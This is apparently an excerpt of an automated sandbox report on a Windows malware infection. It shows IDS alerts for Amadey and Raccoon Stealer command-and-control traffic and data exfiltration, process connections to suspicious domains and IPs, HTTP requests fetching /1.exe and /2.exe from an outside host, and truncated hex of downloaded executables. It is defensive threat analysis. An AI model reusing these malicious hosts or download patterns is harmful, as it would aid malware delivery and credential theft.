                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 8F12.exe, 00000016.00000000.359364135.0000000000413000.00000002.00020000.sdmp, 8F12.exe, 00000016.00000002.441134145.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.439030652.00000000057A0000.00000002.00020000.sdmp
                          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001B.00000003.379398442.00000000037CF000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.377717330.00000000037CF000.00000004.00000001.sdmp
                          Source: C:\Users\user\Desktop\6zsU4O4WHq.exeCode function: 0_2_00419B49 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,0_2_00419B49
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeCode function: 26_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,26_2_00405E40
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeCode function: 26_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,26_2_004096E0
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeCode function: 26_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,26_2_00401280
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeCode function: 26_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,26_2_00401090
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeCode function: 26_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,26_2_00409B40
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeCode function: 26_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,26_2_00409970
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeCode function: 26_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,26_2_004087E0

                          Networking:

                          barindex
                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                          Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.5:49887 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49886 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.5:49894 -> 141.8.194.74:80
                          Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49901 -> 185.163.204.24:80
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.5:49914 -> 81.163.30.181:80
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.5:49917 -> 81.163.30.181:80
                          Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49927 -> 185.163.204.24:80
                          Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49927 -> 185.163.204.24:80
                          Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49901 -> 185.163.204.24:80
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80Jump to behavior
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187Jump to behavior
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144Jump to behavior
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeDomain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80Jump to behavior
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1Host: 81.163.30.181Accept: */*
                          Source: global trafficHTTP traffic detected: GET /2.exe HTTP/1.1Host: 81.163.30.181Accept: */*
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:22:10 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:22:18 GMTContent-Type: application/x-msdos-programContent-Length: 323072Connection: closeLast-Modified: Fri, 14 Jan 2022 11:22:01 GMTETag: "4ee00-5d589030842f9"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 fa 3c cc e1 9b 52 9f e1 9b 52 9f e1 9b 52 9f ff c9 c7 9f fb 9b 52 9f ff c9 d1 9f 67 9b 52 9f c6 5d 29 9f e2 9b 52 9f e1 9b 53 9f 01 9b 52 9f ff c9 d6 9f db 9b 52 9f ff c9 c6 9f e0 9b 52 9f ff c9 c3 9f e0 9b 52 9f 52 69 63 68 e1 9b 52 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c8 56 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f4 03 00 00 a8 11 00 00 00 00 00 40 c3 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 96 8b 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 f0 03 00 28 00 00 00 00 10 15 00 b8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f4 1d 00 00 90 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ee f3 03 00 00 10 00 00 00 f4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 75 74 61 6c 61 00 05 00 00 00 00 e0 14 00 00 02 00 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 76 65 00 00 00 ea 00 00 00 00 f0 14 00 00 02 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 6f 62 65 00 00 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 83 00 00 00 10 15 00 00 84 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 46 00 00 00 a0 15 00 00 48 00 00 00 a6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:22:55 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:23:00 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0